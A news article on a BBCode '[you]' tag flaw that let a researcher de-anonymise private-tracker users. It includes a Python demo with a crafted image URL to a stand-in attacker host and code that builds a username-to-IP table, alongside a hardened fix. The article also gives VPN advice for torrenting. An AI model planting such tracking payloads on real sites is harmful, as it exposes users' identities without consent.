
Security Flaw In Portal Software Exposes Personal Information Of BitTorrenting Users

Wednesday, October 19th, 2016


A security researcher recently discovered a critical flaw in a popular portal software package used by many torrenting websites. After making the discovery, the researcher contacted TorrentFreak, one of the leading destinations for bittorrent news, and disclosed how he had been able to collect personal information from the staff and users of several private torrenting sites (also called private trackers). While the anonymous researcher did not divulge much about which sites were affected, he did reveal that SceneAccess, one of the most popular private trackers on the web, was among them.

As you may already be aware, most torrenting sites come in one of two forms: a) public portals (for example, KickAssTorrents and ThePirateBay) and b) private trackers. The major difference between the two is that anyone can access a public bittorrent site, whereas a private tracker is accessible only to registered members. What's more, joining a private tracker is notoriously difficult, since it requires an invitation that only existing members can create and hand out. This deliberately awkward process was designed to keep law enforcement officials and copyright holders at a distance. But as the anonymous researcher has shown, the close-knit community approach used by private trackers is not foolproof.

The vulnerability lies in the portal software's handling of BBCode (Bulletin Board Code), a crucial part of the software in question. BBCode is widely used by internet forums and many other kinds of websites for text formatting and for simplifying the insertion of emoticons and pictures into webpages and forum posts. According to the researcher, the flaw involves the [you] tag, which the software replaces with the login name of whoever is viewing the page. Because that substitution is performed separately for every viewer, the tag can be smuggled into the URL of an image (for example, http://attackwebsite.com/pic.php?u=[you].jpg). Each member's browser then requests a URL that carries that member's own username from a server the attacker controls; the server answers with a harmless 1×1 pixel image while logging the requester's IP address together with the browser name/version and operating system reported in the request. No JavaScript is needed, and the victim sees nothing unusual on the page.
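The following is an added example, not code from the portal software or from the researcher, that reproduces the mechanism described above in miniature: a vulnerable BBCode renderer that expands [you] everywhere, the access-log lines a hypothetical attacker host would collect when each member views the post, the attacker-side correlation of username to IP address and User-Agent, and a hardened renderer that closes the hole. The hostnames (attacker.example, tracker.example), usernames, IP addresses, User-Agent strings and log format are all constructed for the demonstration.

```python
"""How the [you] tag leaks a viewer's identity, and one way to close the hole.

Added example, not code from the portal software or the researcher.
Hostnames, usernames, IP addresses, User-Agent strings and the log
format are all constructed for the demonstration.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

IMG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r'<img src="([^"]*)"')
LOG_RE = re.compile(r'^(\S+) "GET (\S+)" "(.*)"$')

# Hypothetical attacker host; stands in for the article's attackwebsite.com.
ATTACKER_HOST = "attacker.example"
# Hosts the tracker itself controls; the fix only embeds images from these.
ALLOWED_HOSTS = frozenset({"tracker.example"})

# Constructed members: username -> (IP the attacker's server sees, User-Agent).
VIEWERS = {
    "alice": ("203.0.113.7", "Mozilla/5.0 (Windows NT 10.0) Firefox/49.0"),
    "bob": ("198.51.100.23", "Mozilla/5.0 (X11; Linux x86_64) Chrome/53.0"),
}
# The post (or private message) the attacker submits; [you] sits inside the image URL.
POST = "Hi [you], have you seen this? [img]http://attacker.example/pic.php?u=[you].jpg[/img]"


def render_vulnerable(post, viewer):
    """Mirror the flaw: [you] is expanded everywhere, including inside [img] URLs,
    so each viewer's browser requests a URL carrying that viewer's own username."""
    expanded = post.replace("[you]", viewer)
    return IMG_RE.sub(lambda m: f'<img src="{html.escape(m.group(1))}">', expanded)


def render_hardened(post, viewer, allowed_hosts=ALLOWED_HOSTS):
    """Fix: personalise only the prose, never the inside of [img] tags, and embed
    images only from hosts the site controls (an image proxy would do the same)."""
    out, pos = [], 0
    for m in IMG_RE.finditer(post):
        out.append(html.escape(post[pos:m.start()].replace("[you]", viewer)))
        url = m.group(1)
        if (urlsplit(url).hostname or "").lower() in allowed_hosts:
            out.append(f'<img src="{html.escape(url)}">')  # any literal [you] stays unexpanded
        else:
            out.append("[image removed: external host]")
        pos = m.end()
    out.append(html.escape(post[pos:].replace("[you]", viewer)))
    return "".join(out)


def simulate_views(render, post, viewers):
    """Render the post for every viewer and return the access-log lines the
    attacker's web server would record for the image requests that reach it."""
    log = []
    for user, (ip, ua) in viewers.items():
        for src in SRC_RE.findall(render(post, user)):
            parts = urlsplit(html.unescape(src))
            if parts.hostname == ATTACKER_HOST:
                log.append(f'{ip} "GET {parts.path}?{parts.query}" "{ua}"')
    return log


def correlate(log_lines):
    """Attacker side: the u= parameter names the viewer, the connection gives the
    IP address, and the User-Agent gives browser version and operating system."""
    mapping = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, ua = m.groups()
        for value in parse_qs(urlsplit(target).query).get("u", []):
            username = value[:-4] if value.endswith(".jpg") else value
            mapping[username] = (ip, ua)
    return mapping


if __name__ == "__main__":
    print("vulnerable:", correlate(simulate_views(render_vulnerable, POST, VIEWERS)))
    print("hardened:  ", correlate(simulate_views(render_hardened, POST, VIEWERS)))
```

Run stand-alone, the vulnerable path yields a complete username-to-IP/User-Agent table for every member who merely opened the post, while the hardened path yields nothing because the external image is never fetched. The two defences are independent: refusing to expand [you] inside tag arguments removes the username from the request, and restricting (or proxying) image hosts stops the viewer's IP from reaching a third party at all.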

To test the vulnerability, the researcher posted the crafted BBCode on several private bittorrent sites and also sent private messages containing it to hundreds of users and staff members of those sites. In no time he had gathered a large amount of personal and sensitive data that could be tied to the usernames of a particular site's members. Nothing more than an ordinary account with posting and messaging rights was needed, so the same technique could just as easily be used by law enforcement officials or copyright holders to gather data on the users of private bittorrent sites.

For users who love to download or share via torrents, the researcher had a piece of advice: subscribe to a trustworthy VPN or seedbox service with a zero-log policy. Most renowned VPN providers operate torrent-friendly servers whose IP addresses are shared among hundreds or even thousands of users, and these servers are located in countries where bittorrenting is not illegal. Bear in mind that a VPN only addresses the IP-address half of this leak: the browser and operating-system details, and their link to your username, are still recorded by the attacker's server. Even so, the bottom line is simple; if you love torrenting, use a VPN so that flaws like this one, and others not yet discovered, do not expose your real IP address.

